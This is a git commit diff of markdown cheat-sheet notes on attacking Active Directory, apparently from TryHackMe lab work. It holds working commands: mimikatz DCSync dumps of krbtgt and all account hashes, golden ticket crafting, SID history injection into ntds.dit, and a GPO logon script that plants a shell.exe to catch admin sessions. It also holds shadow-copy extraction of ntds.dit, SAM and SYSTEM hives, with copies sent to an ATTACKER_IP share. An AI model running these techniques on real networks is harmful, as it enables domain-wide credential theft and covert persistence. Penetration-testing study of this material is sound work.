even more info
This commit is contained in:
parent
c78967a9a9
commit
e8c3e42f94
|
|
@ -1,9 +1,8 @@
|
|||
# Active Directory Persistance
|
||||
|
||||
|
||||
## Using Credentials
|
||||
|
||||
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
|
||||
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
|
||||
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
|
||||
* Credentials for multiple local administrators
|
||||
* Service account with delegation permissions
|
||||
|
|
@ -11,22 +10,27 @@
|
|||
|
||||
### Usage
|
||||
|
||||
* Use mimikatz
|
||||
Use mimikatz
|
||||
|
||||
```sh
|
||||
lsadump::dcsync /domain:<domain> /user:<username>
|
||||
```
|
||||
* To query the krbtgt user
|
||||
|
||||
To query the krbtgt user
|
||||
|
||||
```sh
|
||||
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
|
||||
```
|
||||
* Query everything
|
||||
|
||||
Query everything
|
||||
|
||||
```sh
|
||||
lsadump::dcsync /domain:<domain> /all
|
||||
```
|
||||
|
||||
## Using Tickets
|
||||
|
||||
* __Golden Ticket__ crafted TGT,
|
||||
* __Golden Ticket__ crafted TGT,
|
||||
* Needs domain name, domain SID and a user ID to impersonate
|
||||
* Needs krbtgt NTLM to sign the ticket
|
||||
* krbtgt hash never rotates automatically, only refreshed manually
|
||||
|
|
@ -40,7 +44,7 @@ lsadump::dcsync /domain:<domain> /all
|
|||
* DC is never contacted, no contact to any TGT or KDC
|
||||
* Non existing user can be used with a local admin group's SID
|
||||
|
||||
### Usage
|
||||
### Usage
|
||||
|
||||
* Craft a golden ticket
|
||||
```sh
|
||||
|
|
@ -95,22 +99,24 @@ Get-ADUser <your ad username> -properties sidhistory,memberof
|
|||
```sh
|
||||
Get-ADGroup "Domain Admins"
|
||||
```
|
||||
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
|
||||
|
||||
Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
|
||||
|
||||
```sh
|
||||
Stop-Service -Name ntds -force
|
||||
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
|
||||
Add-ADDBSidHistory -SamAccountName 'username of our low-priveleged AD account' -SidHistory 'SID to add to SID History' -DatabasePath C:\Windows\NTDS\ntds.dit
|
||||
Start-Service -Name ntds
|
||||
```
|
||||
* Verify users SIDs
|
||||
```sh
|
||||
Get-ADUser <username> -Properties sidhistory
|
||||
Get-ADUser <username> -Properties sidhistory
|
||||
dir \\<dc.example.com>\C$\
|
||||
```
|
||||
|
||||
## Using Group Memberships
|
||||
|
||||
* Most are monitored security wise
|
||||
* Interesting group for persistence are
|
||||
* Interesting group for persistence are
|
||||
* `IT Support`
|
||||
* Local administrational accounts
|
||||
* Groups with ownership over GPO
|
||||
|
|
@ -126,7 +132,7 @@ New-ADGroup -Path "OU=IT,OU=People,DC=<SUBDC>,DC=<DOMAIN>,DC=COM" -Name "<userna
|
|||
```
|
||||
* And nesting another one
|
||||
```sh
|
||||
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
|
||||
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "<username> Steam Network 2" -SamAccountName "<username>_steam_network2" -DisplayName "<username> Steam Network 2" -GroupScope Global -GroupCategory Security
|
||||
|
||||
Add-ADGroupMember -Identity "<username>_steam_network2" -Members "<username>_steam_network1"
|
||||
```
|
||||
|
|
@ -154,7 +160,7 @@ Get-ADGroupMember -Identity "Domain Admins"
|
|||
|
||||
* AD group templates like `AdminSDHolder` can be used to copy its ACL through the AD's protected groups
|
||||
* Domain Admins
|
||||
* Administrators
|
||||
* Administrators
|
||||
* Enterprise/Schema Administrator
|
||||
* SDProp as a process maps the ACLs to protected groups every hour
|
||||
|
||||
|
|
@ -190,7 +196,7 @@ copy \\<domain>\sysvol\<subdomain>\scripts\shell.exe C:\windows\tmp\_shell.exe &
|
|||
* Select the previously created batch script and PE
|
||||
* Catch the shell when an admin logs on
|
||||
|
||||
* Once again open mmc
|
||||
* Once again open mmc
|
||||
* Right click Enterprise Domain Controllers -> Edit settings, delete, modify security
|
||||
* Click on every other group except Authenticated Users and remove them
|
||||
|
||||
|
|
|
|||
|
|
@ -337,6 +337,17 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam
|
|||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
|
||||
```
|
||||
|
||||
#### In case you are on a DC
|
||||
|
||||
You can extract the AD database which stores every domain account and its password hash via Volume Shadow Copy Service. `NTDS.dit` is stored at `C:\Windows\NTDS\ntdis.dit`.
|
||||
|
||||
```sh
|
||||
vssadmin create shadow /for=C:
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\TEMP\ntds.dit
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\TEMP\system
|
||||
vssadmin delete shadows /shadow={$SHADOW_ID} /quiet
|
||||
```
|
||||
|
||||
### Dump LSASS
|
||||
|
||||
LSASS contains multiple different credential types like NTLM password hashes,
|
||||
|
|
|
|||
Loading…
Reference in New Issue